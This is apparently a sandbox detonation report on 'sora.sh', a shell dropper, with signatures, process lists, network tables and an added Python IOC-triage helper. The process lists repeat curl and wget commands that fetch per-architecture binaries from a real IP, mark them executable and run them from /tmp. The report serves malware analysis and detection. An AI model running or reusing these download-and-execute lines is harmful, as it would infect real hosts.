Analysis Overview
SHA256
19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Threat Level: Shows suspicious behavior
The file sora.sh was found to show suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
Of these, only "Executes dropped EXE" and "Writes file to tmp directory" are attributed to the sample itself (/tmp/sora.sh writing and running /tmp/robben). The "Checks CPU configuration" and "Reads runtime system information" hits in the runs below are reads of /proc/cpuinfo, /proc/self/auxv and /proc/sys/crypto/fips_enabled by /usr/bin/curl, the stock download tool the script invokes, so they should not be read as behavior of the dropped binary.
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-22 21:45
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:50
Platform
debian12-armhf-20240418-en
Max time kernel
299s
Max time network
302s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-timedated.service-eNtkgh]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
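The process list above is the whole story of this sample: for each architecture name (x86_64, mips, mipsel, arm, arm5, ...) the script fetches http://158.51.127.106/bins/<arch>, runs `cat <arch>` (the sandbox records the cat but not the shell redirection that presumably writes /tmp/robben, so nothing here should assume it), runs `chmod +x` over everything in /tmp, and executes `./robben Payload`; whichever binary matches the host keeps running. The helper below is an added example written for this page, not part of the report or of any sandbox tooling: it parses `<image> [<argv>]` entries in the form shown above, extracts the download URLs, hosts and temp-dir executions as IOCs, and flags the repeated fetch -> chmod -> execute-from-/tmp loop as a multi-arch dropper. The sample input is an abridged copy of the entries from this report (behavioral1 uses only curl; the later runs also invoke wget for every fetch), embedded inline so the script runs offline.

```python
"""Triage helper for the sandbox process list above: reconstruct the per-architecture
fetch -> cat -> chmod +x -> execute loop and pull out its IOCs."""
import re
import shlex
from urllib.parse import urlparse

# Constructed input: an abridged copy of the "<image> [<argv>]" entries from the
# Processes lists in this report, one entry per line (not live telemetry).
SAMPLE_PROCESSES = """\
/tmp/sora.sh [/tmp/sora.sh]
/usr/bin/wget [wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl [curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat [cat x86_64]
/usr/bin/chmod [chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8]
/tmp/robben [./robben Payload]
/usr/bin/wget [wget http://158.51.127.106/bins/mips]
/usr/bin/curl [curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat [cat mips]
/usr/bin/chmod [chmod +x robben sora.sh]
/tmp/robben [./robben Payload]
"""

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}   # fetch tools typical of these droppers
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")      # world-writable staging directories
URL_SCHEMES = ("http://", "https://", "ftp://", "tftp://")
ENTRY_RE = re.compile(r"^(?P<image>\S+)\s+\[(?P<argv>.*)\]$")


def parse_processes(text):
    """Turn '<image> [<argv>]' lines into a list of (image, argv) tuples."""
    procs = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            procs.append((m.group("image"), shlex.split(m.group("argv"))))
    return procs


def tool_name(argv):
    """Basename of argv[0], or '' for an empty argv."""
    return argv[0].rsplit("/", 1)[-1] if argv else ""


def first_url(argv):
    """First argument that looks like a download URL, else None."""
    return next((a for a in argv[1:] if a.startswith(URL_SCHEMES)), None)


def mode_grants_exec(mode):
    """True for symbolic modes that add x (+x, u+rx) or octal modes with any x bit set."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return "+" in mode and "x" in mode.split("+", 1)[1]


def extract_iocs(procs):
    """Download URLs (ordered, de-duplicated), their hosts, and images run from temp dirs."""
    urls, hosts, tmp_execs = [], set(), set()
    for image, argv in procs:
        url = first_url(argv) if tool_name(argv) in DOWNLOADERS else None
        if url and url not in urls:
            urls.append(url)
            hosts.add(urlparse(url).hostname)
        if image.startswith(TMP_DIRS):
            tmp_execs.add(image)
    return {"urls": urls, "hosts": sorted(hosts), "tmp_execs": sorted(tmp_execs)}


def detect_dropper_loop(procs, window=5):
    """Find rounds of: fetch URL -> chmod granting x -> exec of a temp-dir binary,
    all within `window` subsequent events.  Each executed binary is attributed to
    one round only, so wget and curl fetching the same file do not double-count."""
    rounds, claimed = [], set()
    for i, (_, argv) in enumerate(procs):
        url = first_url(argv) if tool_name(argv) in DOWNLOADERS else None
        if url is None:
            continue
        chmod_seen = False
        for j in range(i + 1, min(len(procs), i + 1 + window)):
            image_j, argv_j = procs[j]
            if tool_name(argv_j) == "chmod" and len(argv_j) > 1 and mode_grants_exec(argv_j[1]):
                chmod_seen = True
            elif chmod_seen and image_j.startswith(TMP_DIRS):
                if j not in claimed:
                    claimed.add(j)
                    rounds.append({"url": url, "payload": url.rsplit("/", 1)[-1],
                                   "exec": image_j, "argv": argv_j})
                break
    return rounds


def triage(text):
    """Parse, extract IOCs, and give a verdict based on how many distinct payloads looped."""
    procs = parse_processes(text)
    rounds = detect_dropper_loop(procs)
    multi_arch = len({r["url"] for r in rounds}) >= 2
    return {"iocs": extract_iocs(procs), "rounds": rounds,
            "verdict": "multi-arch dropper loop" if multi_arch else "no dropper loop"}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_PROCESSES), indent=2))
```

The window-based matching is deliberate: the sandbox does not expose parent/child links or the redirection inside `cat`, so the only reliable signal is the ordering of fetch, chmod and temp-dir execution. On the full lists above the same function yields one round per architecture name, all pointing at 158.51.127.106, which is the block-list entry and the /tmp/robben path a responder actually needs.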
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-5 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-5 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-5 | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-5 | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:50
Platform
debian12-mipsel-20240221-en
Max time kernel
300s
Max time network
298s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-timedated.service-vrdggE]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-0 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-0 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-0 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-0 | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:50
Platform
debian9-armhf-20240611-en
Max time kernel
300s
Max time network
286s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-806c12d3ba1b433dbef9e362c58cc6bf-systemd-timedated.service-yLlaTN]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
ubuntu2204-amd64-20240522.1-en
Max time kernel
295s
Max time network
297s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 8.8.8.8:53 | _http._tcp.security.ubuntu.com | udp |
| US | 8.8.8.8:53 | _http._tcp.se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 1.1.1.1:53 | security.ubuntu.com | udp |
| US | 1.1.1.1:53 | _http._tcp.se.archive.ubuntu.com | udp |
| US | 1.1.1.1:53 | security.ubuntu.com | udp |
| US | 1.1.1.1:53 | se.archive.ubuntu.com | udp |
| US | 1.1.1.1:53 | se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 8.8.8.8:53 | _http._tcp.se.archive.ubuntu.com | udp |
| GB | 185.125.190.81:80 | security.ubuntu.com | tcp |
| SE | 194.71.11.163:80 | se.archive.ubuntu.com | tcp |
| US | 8.8.8.8:53 | _http._tcp.saimei.ftp.acc.umu.se | udp |
| US | 8.8.8.8:53 | _http._tcp.chuangtzu.ftp.acc.umu.se | udp |
| US | 8.8.8.8:53 | saimei.ftp.acc.umu.se | udp |
| US | 8.8.8.8:53 | saimei.ftp.acc.umu.se | udp |
| US | 8.8.8.8:53 | chuangtzu.ftp.acc.umu.se | udp |
| US | 8.8.8.8:53 | chuangtzu.ftp.acc.umu.se | udp |
| US | 1.1.1.1:53 | saimei.ftp.acc.umu.se | udp |
| US | 1.1.1.1:53 | chuangtzu.ftp.acc.umu.se | udp |
| US | 1.1.1.1:53 | chuangtzu.ftp.acc.umu.se | udp |
| SE | 194.71.11.167:80 | chuangtzu.ftp.acc.umu.se | tcp |
| US | 8.8.8.8:53 | saimei.ftp.acc.umu.se | udp |
| US | 8.8.8.8:53 | saimei.ftp.acc.umu.se | udp |
| SE | 194.71.11.138:80 | saimei.ftp.acc.umu.se | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
299s
Max time network
295s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
